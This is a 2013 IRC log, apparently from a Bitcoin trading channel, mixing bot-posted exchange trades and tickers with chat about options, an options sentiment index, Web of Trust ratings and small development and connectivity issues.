jk :) Mar 02 16:44:54 well inasmuch as it's fake internet money, what diff does it make. Mar 02 16:45:05 BitHub pity, i'd totally have put it up in the faq Mar 02 16:45:15 haha Mar 02 16:45:24 i like your faq Mar 02 16:45:28 "this is dog" Mar 02 16:45:42 it may be dog, but it's a bitch for translators. Mar 02 16:57:14 http://articles.chicagotribune.com/2013-03-01/business/chi-square-told-to-stop-processing-mobile-payments-in-ill-20130301_1_mobile-payments-illinois-regulators-cell-phone Mar 02 17:03:05 [MPEX] [O.BTCUSD.C370T] 1000 @ 0.20812111 = 208.1211 BTC [-] Mar 02 17:03:07 [MPEX] [O.BTCUSD.C350T] 1000 @ 0.23354686 = 233.5469 BTC [-] Mar 02 17:03:08 [MPEX] [O.BTCUSD.C330T] 1000 @ 0.26232486 = 262.3249 BTC [-] Mar 02 17:03:19 [MPEX] [O.BTCUSD.C310T] 1000 @ 0.29467593 = 294.6759 BTC [-] Mar 02 17:04:04 lol http://www.theverge.com/2013/3/1/4054762/obama-strikes-back-after-illogical-jedi-mind-meld-comment Mar 02 17:18:10 [HAVELOCK] [SDICE] 8 @ 0.68 = 5.44 BTC [+] Mar 02 17:19:01 [MPEX] [O.BTCUSD.C370T] 1000 @ 0.20807672 = 208.0767 BTC [-] Mar 02 17:19:03 [MPEX] [O.BTCUSD.C350T] 1000 @ 0.23350323 = 233.5032 BTC [-] Mar 02 17:19:05 [MPEX] [O.BTCUSD.C330T] 1000 @ 0.26228253 = 262.2825 BTC [-] Mar 02 17:19:07 oh my. Mar 02 17:19:15 [MPEX] [O.BTCUSD.C310T] 1000 @ 0.29463549 = 294.6355 BTC [-] Mar 02 17:19:54 can some1 can explain thids for me please ? Mar 02 17:20:03 Big beta Mar 02 17:20:08 Bets Mar 02 17:20:21 still a noob for this kind of stuff Mar 02 17:20:34 bet on 37$ ? Mar 02 17:21:06 on just a little under 37 i think Mar 02 17:21:15 More like $50 Mar 02 17:21:16 no wait. actually, on 44 Mar 02 17:21:17 yeah Mar 02 17:21:23 oix calls side says 44.0 Mar 02 17:21:37 but i guess the person is probably going for the psychological 50 Mar 02 17:21:37 what the name of this order ? (needed for google) Mar 02 17:21:45 error4733 call options ? Mar 02 17:21:46 Yah Mar 02 17:21:49 this Mar 02 17:22:02 thanks ;) i told you i'm a noob hehe Mar 02 17:22:25 dude if we have a new max in feb and break 50 in march... Mar 02 17:22:38 true that it's a long (5 week) month Mar 02 17:23:30 Those need it to hit 46.5 Mar 02 17:23:57 not unlikely Mar 02 17:23:58 At least the 37s Mar 02 17:24:37 ;;asks 47 Mar 02 17:24:39 There are currently 38136.24 bitcoins offered at or under 47.0 USD, worth 1443933.18817 USD in total. Mar 02 17:24:57 ;;asks 37 Mar 02 17:24:59 There are currently 18088.055 bitcoins offered at or under 37.0 USD, worth 641235.039706 USD in total. Mar 02 17:25:12 same wall as 32$ Mar 02 17:25:13 mil and a half. somehow it doesn't look like much at all. Mar 02 17:25:17 i wonder if this signals the top is in. Mar 02 17:25:51 [MPEX] [O.BTCUSD.C370T] 1000 @ 0.20803246 = 208.0325 BTC [-] Mar 02 17:25:53 [MPEX] [O.BTCUSD.C350T] 1000 @ 0.23345974 = 233.4597 BTC [-] Mar 02 17:25:54 [MPEX] [O.BTCUSD.C330T] 1000 @ 0.26224033 = 262.2403 BTC [-] Mar 02 17:26:06 [MPEX] [O.BTCUSD.C310T] 1000 @ 0.29459517 = 294.5952 BTC [-] Mar 02 17:26:07 If its that other big fish, it will prob tank within 24 hours Mar 02 17:26:09 he's gonna buy the whole book isnt he. Mar 02 17:26:25 He will exit for a 30% loss Mar 02 17:26:32 lol i recall that. Mar 02 17:26:34 And it will then bounce Mar 02 17:26:39 to 50 Mar 02 17:26:40 lmao Mar 02 17:26:44 it totally happened once Mar 02 17:26:46 And continue up to 50 Mar 02 17:26:53 Last month Mar 02 17:27:00 wasn't it end of jan ? Mar 02 17:27:07 Happened twice Mar 02 17:27:15 i recall the huge puts scramble end of jan Mar 02 17:27:21 End of jan with the short puts Mar 02 17:27:23 ya Mar 02 17:27:27 And again mid feb Mar 02 17:27:32 [MPEX] [S.DICE] 10000 @ 0.0063777 = 63.777 BTC [-] Mar 02 17:27:55 Heyyo Mar 02 17:28:10 777 is that some sort of payout ? Mar 02 17:28:11 [HAVELOCK] [SDICE] 27 @ 0.646 = 17.442 BTC [-] Mar 02 17:28:12 [HAVELOCK] [SDICE] 20 @ 0.646 = 12.92 BTC [-] Mar 02 17:28:13 [HAVELOCK] [SDICE] 3 @ 0.6455 = 1.9365 BTC [-] Mar 02 17:28:13 [HAVELOCK] [SDICE] 3 @ 0.6452 = 1.9356 BTC [-] Mar 02 17:28:14 [HAVELOCK] [SDICE] 12 @ 0.6451 = 7.7412 BTC [-] Mar 02 17:28:15 [HAVELOCK] [SDICE] 35 @ 0.642 = 22.47 BTC [-] Mar 02 17:29:20 hmm, i have an idea. Mar 02 17:29:47 [MPEX] [S.DICE] 5000 @ 0.0063777 = 31.8885 BTC [-] Mar 02 17:30:49 ? i'm still drunk ? those order should normlay got a [+] Mar 02 17:32:19 price went down - Mar 02 17:32:47 interested in hearing this idea Mar 02 17:34:06 http://www.onerandomb.com/wp-content/uploads/2012/06/jackie-chan-meme.png Mar 02 17:34:11 [HAVELOCK] [SDICE] 20 @ 0.642 = 12.84 BTC [-] Mar 02 17:36:10 [HAVELOCK] [SDICE] 7 @ 0.665 = 4.655 BTC [+] Mar 02 17:36:43 [MPEX] [O.BTCUSD.C370T] 1000 @ 0.20799254 = 207.9925 BTC [-] Mar 02 17:36:45 [MPEX] [O.BTCUSD.C350T] 1000 @ 0.23342052 = 233.4205 BTC [-] Mar 02 17:36:56 [MPEX] [O.BTCUSD.C330T] 18 @ 0.262 = 4.716 BTC [-] Mar 02 17:36:58 [MPEX] [O.BTCUSD.C330T] 982 @ 0.26220227 = 257.4826 BTC [+] Mar 02 17:37:05 [MPEX] [O.BTCUSD.C310T] 1000 @ 0.29455881 = 294.5588 BTC [-] Mar 02 17:37:38 !ticker m ^oix Mar 02 17:37:41 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.00000027 / 0.00000041 / 0.00000045 ( shares, 0.00 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 02 17:37:49 aha. Mar 02 17:39:07 !ticker m ^oix Mar 02 17:39:09 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 26.99890377 / 41.78034705 / 44.6280476 ( shares, 8,354.47 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 02 17:39:20 so the more people factor this OIX into their decisions, the more it manifests it's own value Mar 02 17:39:22 genius Mar 02 17:39:27 ok so, the low is put oix, the high is call oix, the avg is mixed oix. Mar 02 17:39:40 ThickAsThieves virus :D Mar 02 17:40:44 Love the oix idea btw Mar 02 17:40:58 :) Mar 02 17:41:17 so is an oix asset coming up too? Mar 02 17:41:24 !ticker m ^oix Mar 02 17:41:26 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 26.99890377 / 41.78034705 / 44.6280476 (no shares, 8,354.47 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 02 17:41:34 ahaha check that out, i can now hax assbot. Mar 02 17:42:58 ThickAsThieves well possibly. i think it's not heavy enough yet to trade. Mar 02 17:43:22 maybe a decent idea for a PT, but i'd be loath to introduce it to mpex, have someone dump 5k on it Mar 02 17:43:32 when itself it's only based on like 8k atm and may at any time zero out even Mar 02 17:44:35 [MPEX] [O.BTCUSD.C370T] 1000 @ 0.20795276 = 207.9528 BTC [-] Mar 02 17:44:37 [MPEX] [O.BTCUSD.C350T] 1000 @ 0.23338143 = 233.3814 BTC [-] Mar 02 17:44:48 [MPEX] [O.BTCUSD.C330T] 1000 @ 0.26216435 = 262.1644 BTC [-] Mar 02 17:44:50 [MPEX] [O.BTCUSD.C310T] 1000 @ 0.29452258 = 294.5226 BTC [-] Mar 02 17:44:52 yup he's buying the book, no doubt about it Mar 02 17:45:04 yeah i was mostly thinking about potential PT too Mar 02 17:45:29 now this is def beyond my knowledge, Mar 02 17:45:39 actually it would prolly make a wunderbar hedge for anchoring tyhings like ltc Mar 02 17:45:41 but buying the book essentially puts him in control? Mar 02 17:46:03 ThickAsThieves in a sense. it takes the bot out of the offer market, so he might be able to offer them back at w/e price suits him Mar 02 17:46:17 but its limited Mar 02 17:46:40 i think there's a lot of potential for playing ltc assets and ltc in general against btc Mar 02 17:46:49 ya possibly. Mar 02 17:47:04 ive been buying up stuff Mar 02 17:47:04 it's unlikely you'd make a oix bet that's too big in ltc, because ltc is kinda small. Mar 02 17:48:28 ltc=.0788 usd Mar 02 17:48:35 .00243 BTC Mar 02 17:49:28 i'm tempting to get into botting on BTCe Mar 02 17:49:38 but its one more thing for me to learn Mar 02 17:49:51 you can push the price so easy Mar 02 17:50:12 even a 5000ltc buy at the right time of day sways the price for a while Mar 02 17:51:05 ;;calc 5000*.00243 Mar 02 17:51:05 12.15 Mar 02 17:51:08 eh? Mar 02 17:51:35 LETS FUCK UP LTC WITH 12 BTC Mar 02 17:52:19 it's the plan with my SD div Mar 02 17:52:19 hehe, Mar 02 17:52:48 depends on time of day Mar 02 17:52:59 like right now 5000ltc doesnt make a big dent Mar 02 17:53:02 [MPEX] [O.BTCUSD.C370T] 1000 @ 0.20790871 = 207.9087 BTC [-] Mar 02 17:53:04 but last night it did Mar 02 17:53:06 [MPEX] [O.BTCUSD.C350T] 1000 @ 0.23333813 = 233.3381 BTC [-] Mar 02 17:53:11 [MPEX] [O.BTCUSD.C330T] 1000 @ 0.26212234 = 262.1223 BTC [-] Mar 02 17:53:13 [MPEX] [O.BTCUSD.C310T] 1000 @ 0.29448245 = 294.4825 BTC [-] Mar 02 17:53:49 5k ltc is what, like twenny bux ? Mar 02 17:54:10 413 Mar 02 17:54:43 if someone took 100-150btc into btc-e Mar 02 17:54:48 you could control it probably Mar 02 17:55:45 speaking of socks, http://sphotos-b.xx.fbcdn.net/hphotos-snc7/482780_10151514214651427_1000150296_n.jpg Mar 02 17:56:17 ;;calc 5000 * .0788 Mar 02 17:56:18 394 Mar 02 17:56:26 aha Mar 02 17:56:53 ;;gettrust ThickAsThieves Mar 02 17:56:55 Trust relationship from user mircea_popescu to user ThickAsThieves: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=ThickAsThieves Mar 02 17:57:15 aww y not in the wot Mar 02 17:58:16 i'm a noob Mar 02 17:58:17 is why Mar 02 17:58:22 so get reg'd. Mar 02 17:58:30 i should Mar 02 17:58:46 curious, why did you look me up? Mar 02 17:58:57 because i am looking for a ltc broker. Mar 02 17:59:02 ah Mar 02 17:59:36 what are your evil plans mp Mar 02 17:59:52 crash ltc Mar 02 17:59:54 they're not evil he said knowingly. Mar 02 18:00:02 :) Mar 02 18:01:44 [MPEX] [O.BTCUSD.C370T] 1000 @ 0.20734514 = 207.3451 BTC [-] Mar 02 18:01:46 [MPEX] [O.BTCUSD.C350T] 1000 @ 0.23274072 = 232.7407 BTC [-] Mar 02 18:01:57 [MPEX] [O.BTCUSD.C330T] 1000 @ 0.26148834 = 261.4883 BTC [-] Mar 02 18:01:59 [MPEX] [O.BTCUSD.C310T] 1000 @ 0.29382066 = 293.8207 BTC [-] Mar 02 18:08:08 i think i did that right Mar 02 18:08:17 ;;gettrust ThickAsThieves Mar 02 18:08:18 Trust relationship from user ThickAsThieves to user ThickAsThieves: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=ThickAsThieves&dest=ThickAsThieves Mar 02 18:11:48 [MPEX] [O.BTCUSD.C370T] 1000 @ 0.20730639 = 207.3064 BTC [-] Mar 02 18:11:50 [MPEX] [O.BTCUSD.C350T] 1000 @ 0.23270264 = 232.7026 BTC [-] Mar 02 18:11:59 ;;getrating ThickAsThieves Mar 02 18:12:00 This user has not yet been rated. WARNING: Currently not authenticated. Mar 02 18:12:04 [MPEX] [O.BTCUSD.C330T] 642 @ 0.26145139 = 167.8518 BTC [-] Mar 02 18:12:06 [MPEX] [O.BTCUSD.C310T] 697 @ 0.29378535 = 204.7684 BTC [-] Mar 02 18:12:28 seems you're there. Mar 02 18:12:34 and the book's gone on the low end Mar 02 18:13:19 ok now i did it Mar 02 18:13:33 missed the bcverify step Mar 02 18:14:01 so now i should call in some recent people i transacted with to get some ratings in there right? Mar 02 18:20:56 ;;getrating ThickAsThieves Mar 02 18:20:57 Currently authenticated from hostmask ThickAsThieves!ThickAsThi@c-98-231-58-41.hsd1.fl.comcast.net . User thickasthieves, rated since Sat Mar 2 08:19:18 2013. Cumulative rating 1, from 1 total ratings. Received ratings: 1 positive, 0 negative. Sent ratings: 0 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=thickasthieves Mar 02 18:21:01 yay Mar 02 18:25:12 [HAVELOCK] [HIM] 9 @ 1.6 = 14.4 BTC [-] Mar 02 18:25:40 _;;rate ThickAsThieves -10 welcome Mar 02 18:26:10 :P Mar 02 18:26:44 >:D Mar 02 18:38:52 [BTCTC] [COGNITIVE] 1 @ 0.3 BTC [+] Mar 02 18:39:18 mircea_popescu: in the push receipt, quantity will be split with a thousands separator right? like 1`456`231 ? Mar 02 18:39:21 Your order to push 1xS.DICE ...etc Mar 02 18:39:36 let me check that for you Mar 02 18:40:04 no, it will not. Mar 02 18:41:49 ah k thanks. just /[0-9]+/ then? Mar 02 18:41:54 uyp Mar 02 18:42:02 no dots either, an integer value Mar 02 18:42:08 perfect Mar 02 18:42:30 incidentally : you can test push by pushing to your own account Mar 02 18:42:36 to your heart's content. Mar 02 18:42:43 ooo good to know! Mar 02 18:42:44 thanks Mar 02 18:43:00 im _almost_ ready to do a test :) Mar 02 18:43:58 it person is like "yes, you said no separators there because people may want to use it programatically" Mar 02 18:44:07 im like... dude... totally. back in january Mar 02 18:47:07 haha nice Mar 02 18:47:19 well programatically i wouldnt care, just need to konw one way or another Mar 02 18:47:37 no difference between /[0-9`]+/ and /[0-9]+/ Mar 02 18:53:05 36000 calls Mar 02 18:53:37 [BTCTC] [COGNITIVE] 30 @ 0.3 = 9 BTC [+] Mar 02 19:00:17 frizz is stickin to it https://bitcointalk.org/index.php?topic=147914.msg1575388#msg1575388 Mar 02 19:03:44 many will agree with him Mar 02 19:03:51 idc Mar 02 19:03:55 but they will Mar 02 19:05:56 I don't know the story, but if the fees are disclosed in the terms and he didn't read or agree to them, then tough hash. Mar 02 19:25:42 [MPEX] [S.MPOE] 6771 @ 0.0007476 = 5.062 BTC [-] Mar 02 19:25:47 [MPEX] [S.MPOE] 1671 @ 0.00074398 = 1.2432 BTC [-] Mar 02 19:38:13 [HAVELOCK] [SDICE] 1 @ 0.6799 BTC [+] Mar 02 19:44:21 hello everyone Mar 02 19:50:26 whats new everyone? Mar 02 19:56:41 just finishing my mpex->havelock push code Mar 02 19:56:46 looking for testers soon :) Mar 02 20:08:39 [BTCTC] [BTC-BOND] 10 @ 0.01 = 0.1 BTC [+] Mar 02 20:43:57 /j #nachatroom Mar 02 20:55:59 [MPEX] [S.MPOE] 7794 @ 0.00074398 = 5.7986 BTC [-] Mar 02 20:56:01 [MPEX] [S.MPOE] 41791 @ 0.00073993 = 30.9224 BTC [-] Mar 02 20:56:03 [MPEX] [S.MPOE] 4446 @ 0.00073886 = 3.285 BTC [-] Mar 02 20:57:57 mhm Mar 02 21:01:11 man motion Mar 02 21:02:16 ;;ticker Mar 02 21:02:18 BTCUSD ticker | Best bid: 34.00002, Best ask: 34.09012, Bid-ask spread: 0.09010, Last trade: 34.09012, 24 hour volume: 45679.51468007, 24 hour low: 33.15000, 24 hour high: 34.88000, 24 hour vwap: 34.01969 Mar 02 21:05:50 ;;ticker m s.dice Mar 02 21:05:51 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid currency (1 more message) Mar 02 21:11:38 is there a unicode character for bitcoin yet? Mar 02 21:13:34 https://en.bitcoin.it/wiki/Bitcoin_symbol Mar 02 21:14:27 thanks :) Mar 02 21:15:40 kakobrekla big surprise there. Mar 02 21:16:13 http://bitbet.us/bet/277/bitbet-haxxed-in-2013/ Mar 02 21:16:20 lol bet clearly says "all nos will be refunded" Mar 02 21:16:22 people bet no. Mar 02 21:16:23 win. Mar 02 21:23:07 someone used faucet to annoying end? Mar 02 21:23:26 [MPEX] [S.MPOE] 4446 @ 0.00075672 = 3.3644 BTC [+] Mar 02 21:23:28 [MPEX] [S.MPOE] 23938 @ 0.00075673 = 18.1146 BTC [+] Mar 02 21:23:41 [MPEX] [S.MPOE] 10000 @ 0.00075712 = 7.5712 BTC [+] Mar 02 21:23:43 [MPEX] [S.MPOE] 14713 @ 0.00075713 = 11.1397 BTC [+] Mar 02 21:23:54 [MPEX] [S.MPOE] 8427 @ 0.00075999 = 6.4044 BTC [+] Mar 02 21:23:56 [MPEX] [S.MPOE] 37974 @ 0.00076 = 28.8602 BTC [+] Mar 02 21:24:07 [MPEX] [S.MPOE] 502 @ 0.000763 = 0.383 BTC [+] Mar 02 21:24:42 btw, mpex.co is still unavailable from here Mar 02 21:24:46 now where is that mpoe havelock pt Mar 02 21:25:18 maybe i fell into their new anti-ddos filter :( Mar 02 21:25:48 there's a filter ? Mar 02 21:26:20 "Evernote resets all passwords after user information stolen in security breach" Mar 02 21:26:31 maybe they decided to start one... it's too specific and long-standing to be some routing issue Mar 02 21:27:30 mircea, can you pls ask the datacenter or at least give me their email? Mar 02 21:27:43 or whoever might be responsible Mar 02 21:28:07 im pretty sure there's no such thing. Mar 02 21:28:10 can you see trilema ? Mar 02 21:28:20 nope Mar 02 21:28:25 um Mar 02 21:29:01 lesee, can you see ukavra.com ? Mar 02 21:29:27 "You’ve found Pe fuga …" Mar 02 21:29:49 ya well, that's in the same dc, so. Mar 02 21:29:49 so, yes Mar 02 21:30:28 try ditching your dns service provided by yiour isp and use google instead for a day Mar 02 21:30:30 see if it clears it Mar 02 21:30:54 look into the traceroute i put yest, if the ip is correct Mar 02 21:31:04 gimme link again ? Mar 02 21:31:28 http://bitbin.it/Malhw4h3 63.247.64.94 Mar 02 21:31:46 yup Mar 02 21:31:50 hm Mar 02 22:08:31 https://bitcointalk.org/index.php?topic=134024.msg1493309#msg1493309 Mar 02 22:08:34 what a thread killer. Mar 02 22:19:59 Maybe this is a catchier headline... http://www.reddit.com/r/Bitcoin/comments/19jdmw/bitcoin_options_index_oix_price_sentiment/ Mar 02 22:53:32 frickin finally Mar 02 22:54:15 [HAVELOCK] [HIM] 1 @ 1.59 BTC [-] Mar 02 22:54:16 [HAVELOCK] [HIM] 1 @ 1.588 BTC [-] Mar 02 22:54:17 [HAVELOCK] [HIM] 2 @ 1.56 = 3.12 BTC [-] Mar 02 22:54:18 [HAVELOCK] [HIM] 3 @ 1.56 = 4.68 BTC [-] Mar 02 22:54:38 just got this huge problem fixed Mar 02 22:57:15 [HAVELOCK] [HIM] 4 @ 1.55 = 6.2 BTC [-] Mar 02 23:00:10 damn grails app was shitting the bed. Mar 02 23:06:36 good for you Mar 02 23:06:46 in the news ...Bit4X Affiliate program Mar 02 23:06:47 http://bit4x.com/news.html Mar 02 23:06:50 is it clear? Mar 02 23:07:56 Bugpowder pretty cool stuff Mar 02 23:08:19 kakobrekla haha cool Mar 02 23:08:28 sounds eerily familiar :D Mar 02 23:08:33 :DDD Mar 02 23:08:35 i admit. Mar 02 23:08:56 "The bonuses may be withdrawn" Mar 02 23:09:01 this makes it sound like it's taken away Mar 02 23:09:30 its not taken away, you just dont have the right to withdraw it before that Mar 02 23:09:43 its abuse protection Mar 02 23:09:47 yeah i figure Mar 02 23:09:53 costs nothing to register unlike in your case Mar 02 23:10:35 "To protect against the situation where someone deposits, gets the bonus and immediately withdraws this offer is only valid for accounts which trade at least X" Mar 02 23:11:13 ok sounds better Mar 02 23:11:21 gonna switch Mar 02 23:11:26 ty Mar 02 23:11:28 np Mar 02 23:12:59 what is the last div for asicminer ? Mar 02 23:18:54 you could have the bonus vest after x days or y trading volume Mar 02 23:19:40 hm, i guess so Mar 02 23:19:45 ah well it is what it is now Mar 02 23:23:18 i read that as a bonus vest originally Mar 02 23:23:22 and i was thinking whoa mmorpg Mar 02 23:30:24 up to 4th place Mar 02 23:30:25 http://www.reddit.com/r/Bitcoin/ Mar 02 23:31:38 who;'s got a reddit acct ? vote the man's story! Mar 02 23:31:48 lol Mar 02 23:32:01 Bitcoin Options Index (^OIX) price sentiment indicator hits all time high ($42.66 / BTC) (self.Bitcoin) Mar 02 23:32:01 submitted 1 hour ago* by Bugpowder Mar 02 23:32:01 commentshare Mar 02 23:32:01 6 Mar 02 23:32:01 15 Mar 02 23:32:01 Bitcoins price sentiment at a bearish weekly high, still twice as many believe in higher prices within 6 months. You agree? (self.Bitcoin) Mar 02 23:32:02 funny. Mar 02 23:32:06 right next to each other. Mar 02 23:32:10 no link karma unfortunately Mar 02 23:32:22 Yah that dude has a little internet vote button Mar 02 23:32:26 yawn Mar 02 23:32:27 what's a "bearish weekly high" ?! Mar 02 23:32:36 I couldn't figure it out Mar 02 23:33:19 it's one of those cases where his point is like the puss in a zit Mar 02 23:33:27 you're sure it must be in there somewhere, but you really don't want to dig it out Mar 02 23:33:53 in other news, romanian politics (in english) : http://trilema.com/2013/no-seriously-not-much-of-a-priority-anymore/ Mar 02 23:43:17 [BTCTC] [BASIC-MINING] 7 @ 0.35 = 2.45 BTC [+] Mar 02 23:43:50 [BTCTC] [COGNITIVE] 8 @ 0.3 = 2.4 BTC [+] Mar 02 23:50:21 Bugpowder you're up 12 votes now, and check ouit the comment Mar 02 23:52:28 too just looking on it Mar 02 23:52:29 lol Mar 02 23:55:05 Mar 02 23:57:16 [HAVELOCK] [SDICE] 2 @ 0.675 = 1.35 BTC [-] Mar 02 23:59:03 with a little luck the comment'll get more upvotes than the article itself Mar 02 23:59:16 aight. my electrum wallet doesnt work wtf Mar 03 00:01:58 [MPEX] [S.MPOE] 16000 @ 0.00075923 = 12.1477 BTC [-] Mar 03 00:02:00 [MPEX] [S.MPOE] 1262 @ 0.00075924 = 0.9582 BTC [+] Mar 03 00:02:02 [MPEX] [S.MPOE] 10457 @ 0.000763 = 7.9787 BTC [+] Mar 03 00:02:03 [MPEX] [S.MPOE] 10000 @ 0.00076342 = 7.6342 BTC [+] Mar 03 00:02:10 [MPEX] [S.MPOE] 14250 @ 0.00076508 = 10.9024 BTC [+] Mar 03 00:02:14 [MPEX] [S.MPOE] 11600 @ 0.00076655 = 8.892 BTC [+] Mar 03 00:02:16 [MPEX] [S.MPOE] 10000 @ 0.00076844 = 7.6844 BTC [+] Mar 03 00:02:17 [HAVELOCK] [SDICE] 2 @ 0.6799 = 1.3598 BTC [+] Mar 03 00:02:19 [MPEX] [S.MPOE] 11500 @ 0.00076944 = 8.8486 BTC [+] Mar 03 00:03:54 [MPEX] [O.BTCUSD.P350T] 650 @ 0.2674139 = 173.819 BTC [-] Mar 03 00:04:11 !ticker m ^oix Mar 03 00:04:13 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 27.06923527 / 42.61596516 / 44.80704907 (no shares, 12,332.19 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 03 00:04:26 ;;ticker Mar 03 00:04:27 BTCUSD ticker | Best bid: 34.19001, Best ask: 34.24800, Bid-ask spread: 0.05799, Last trade: 34.24800, 24 hour volume: 40994.03888350, 24 hour low: 33.15000, 24 hour high: 34.88000, 24 hour vwap: 33.96591 Mar 03 00:04:38 ;;calc 12332.19*33.96 Mar 03 00:04:39 418801.1724 Mar 03 00:05:12 this oix thing... it's actually pretty grounded Mar 03 00:06:02 I just wonder how much of the tracking of it to BTC price is due to the MPOE bot's algorithm vs. true market sentiment Mar 03 00:06:23 there is, of course, a limit to how far a put or call imbalance can push the OIX Mar 03 00:06:39 also, have you examined its predictive power? Mar 03 00:06:40 actually, there was a point where the oix was pushed to like 90 Mar 03 00:06:45 the red horiz line on the graph Mar 03 00:06:51 but how do you mean about mpoe bot ? Mar 03 00:06:54 was that near opex? Mar 03 00:07:04 whatever you call the option market making bot Mar 03 00:07:23 Bugpowder i think miodterm. i think it was on an otherwise empty book someone buying some weird far out call Mar 03 00:07:48 like at this time horizion out, even a 100-0 call put ratio can only push the OIX so high dependent on the call price Mar 03 00:08:14 [BTCTC] [GSDPT] 100 @ 0.0064 = 0.64 BTC [+] Mar 03 00:08:17 Is the OIX the like CO2? A trailing indicator? Mar 03 00:08:18 :) Mar 03 00:08:50 ahh, its in the vwap now :) Mar 03 00:08:52 sweet Mar 03 00:09:07 Bugpowder well, haerd to tell really. Mar 03 00:09:11 what do you make of that graph ? Mar 03 00:09:22 it's highly correlated! Mar 03 00:09:53 you, or someone (or me) should look at it's predictive power Mar 03 00:10:05 is there historical option trade data available? Mar 03 00:10:24 well, if you kept the logs... Mar 03 00:10:58 tell you what, if you promise to write a good statistical analysis and publish it i'll send you the ~300 datapoints on that graph Mar 03 00:11:12 daily oix and daily btc/usd vwap Mar 03 00:11:34 Let me consult with my statistical wizard friend Mar 03 00:11:39 by all means. Mar 03 00:12:05 to me it looks more just glorified call/put sold ratio Mar 03 00:12:11 of course if there IS predictive power Mar 03 00:12:26 maybe I don't want to publish ;) Mar 03 00:12:27 because most of calls have same breakeven point, puts likewise Mar 03 00:12:49 jurov the C750T calls dont Mar 03 00:12:51 Bugpowder the thing is, my bet is that there is predictive power of arbitrary precision for contiguous subsets Mar 03 00:12:57 which are dispersed in the full dataset Mar 03 00:13:15 it'd only be fair in the fucked sense that term takes in any natural science/ Mar 03 00:13:32 jurov they don't really have the same breakeven point Mar 03 00:13:50 i found them being +- 1BTC Mar 03 00:13:52 draw the graph if you will, it's a symetrical butterfly. Mar 03 00:13:59 er... +-1USD Mar 03 00:14:20 O.BTCUSD.P290T sells 0.14869039 Mar 03 00:14:48 O.BTCUSD.P590T sells 0.96290455 Mar 03 00:15:04 ;;calc 29 / (1 - 0.14869039) Mar 03 00:15:05 34.0651622622 Mar 03 00:15:09 eh my bad Mar 03 00:15:11 gonna try and explain bitcoin to the wife tomorrow... Mar 03 00:15:12 ;;calc 29 / (1 + 0.14869039) Mar 03 00:15:13 25.2461413906 Mar 03 00:15:23 ;;calc 59 / (1 + 0.96290455) Mar 03 00:15:24 30.057498211 Mar 03 00:15:26 5. Mar 03 00:16:10 so,i remember wrong again.. maybe i considered just narrower range Mar 03 00:16:12 O.BTCUSD.C290T = 0.32626257 ; O.BTCUSD.C590T = 0.06210314 Mar 03 00:16:23 ;;calc 29 / (1 - 0.32626257) Mar 03 00:16:24 43.0434746664 Mar 03 00:16:31 ;;calc 59 / (1 - 0.06210314) Mar 03 00:16:32 62.9067038352 Mar 03 00:16:35 19 Mar 03 00:16:52 there's a very speciffic=looking graph of the options breakeven points if you calc them all out Mar 03 00:18:39 it's all pointing to 42 Mar 03 00:18:44 imo Mar 03 00:18:44 totally. Mar 03 00:18:53 :) Mar 03 00:23:39 1 BTC = 34.06157 U.S. dollars = 26.1649793 Euros Mar 03 00:23:58 http://polimedia.us/dtng/c/src/136226300119.png Mar 03 00:24:30 looking at it roughly : A totally took a bite of concrete, B sort of predicted something, but muchkly exaggerated. Mar 03 00:24:34 C however actually predicts. Mar 03 00:25:07 so maybe predictive power is actually monotonous. Mar 03 00:25:30 monotonic* Mar 03 00:26:27 also the crazyspike pre-A does sort of predict Mar 03 00:26:30 1 BTC = 34.02000 U.S. dollars = 26.1330466 Euros Mar 03 00:26:43 Hmmm.... Is this 24hprc? Mar 03 00:26:48 yes Mar 03 00:27:30 A lot of the option purchases occur when there is a large divergence between realtime spot price and 24hprc Mar 03 00:28:09 in which case, we might be able to say (the spot price predicts future 24hprc) Mar 03 00:28:25 as filtered through options purchases. Mar 03 00:28:26 this is not actually true tho. Mar 03 00:28:28 for instance right now Mar 03 00:28:29 ;;ticker Mar 03 00:28:31 BTCUSD ticker | Best bid: 34.10101, Best ask: 34.20462, Bid-ask spread: 0.10361, Last trade: 34.02000, 24 hour volume: 40252.89496290, 24 hour low: 33.15000, 24 hour high: 34.88000, 24 hour vwap: 33.95090 Mar 03 00:28:41 [BTCTC] [S.MPOE-PT] 500 @ 0.00073 = 0.365 BTC [+] Mar 03 00:28:42 the difference is small, yet i just sold 80% of the month's book Mar 03 00:28:57 that big option buy today is the exception that proves the rule Mar 03 00:29:15 [HAVELOCK] [SDICE] 3 @ 0.67 = 2.01 BTC [-] Mar 03 00:29:15 many times it was the case that large buys didn't match the theory Mar 03 00:29:20 bah Mar 03 00:29:24 moreover, there was a huge differential for days till yest Mar 03 00:29:25 maybe Mar 03 00:29:28 that yielded no actual purchases Mar 03 00:29:35 bah Mar 03 00:29:38 humbug Mar 03 00:29:42 ok Mar 03 00:29:49 well it was a good theory, but i don't think it meets the data so far Mar 03 00:30:02 well MY options purchases occur during divergence periods Mar 03 00:30:06 hehehe Mar 03 00:30:07 that's fine :) Mar 03 00:30:16 but sometimes you made and sometimes you lost on that strategy Mar 03 00:30:31 so in short i doubt the short term anything but weakly predicts the vwap Mar 03 00:54:37 It's available! http://imgur.com/UBC60Vf Mar 03 00:54:42 BITCOIN is not though Mar 03 00:56:42 [BTCTC] [S.BBET-PT] 94 @ 0.002125 = 0.1998 BTC [+] Mar 03 00:57:07 1 BTC = 34.12900 U.S. dollars = 26.2167768 Euros Mar 03 01:01:10 